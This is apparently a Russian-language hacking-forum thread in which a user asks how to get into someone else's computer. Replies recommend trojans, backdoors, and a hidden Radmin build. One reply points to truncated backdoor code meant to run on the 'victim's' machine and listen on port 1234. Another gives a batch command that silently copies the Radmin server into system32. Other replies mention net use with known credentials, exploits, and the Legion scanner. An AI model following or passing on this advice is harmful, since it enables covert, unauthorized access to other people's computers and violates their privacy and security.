![]() |
расскажите(напишите) подробно как в чужом компе шарить, что нужно для этого?
как в чужом компе шарить, что нужно для этого? мне какой нить трояна ему надо да и через неттул?
|
Цитата:
Для остальных есть особый бекдор с новым подходом ;) |
RAdmin-ом шарить))
|
Цитата:
|
запусти этот код на компе жертвы и лезей сколько угодно (если не стоит фаера и нет Ната) или перекодить на connect back. А так коннетится на порт 1234 главное WSAStartup незабыть сделать
Код:
var |
Hidden сборкой рАдмина
|
Ыыыы, slesh порадовал)))...
+ |
Если локальная сеть зная логин и пасс пользователя... или же если открыт гостевой доступ... то можно тупа подключить сетевой диск 'net use /?' читай...
есть еще стандартный виндовый удалленный рабочий стол. есть радмин настройки сервера (которого будешь ставить юзеру) настраиваешь у себя бекапишь веточку реестра... а патом батником или напрограммируй незаметненько Код:
copy ".\file\r_server.exe" "%WinDir%\system32\r_server.exe"опять же всевозможные сплоиты и сканеры. в старадавние времена я пользовался лишь Legion-ом Цитата:
|
Извиняюсь, я в лазини по чужим компа не великий спец, но заинтересовало
Получается, если на компе WinXP и внешний IP адрес, то можно лазить куды угодно? Или как? Прошу разъяснить вопрос. |
Цитата:
Под внешний IP есть много бесплатных бекдоров. А если у жертвы NAT (отсутствие внешнего IP, у большинства именно NAT), то тут только платные бекдоры. (см. второе сообщение в этой теме) |
| Время: 09:18 |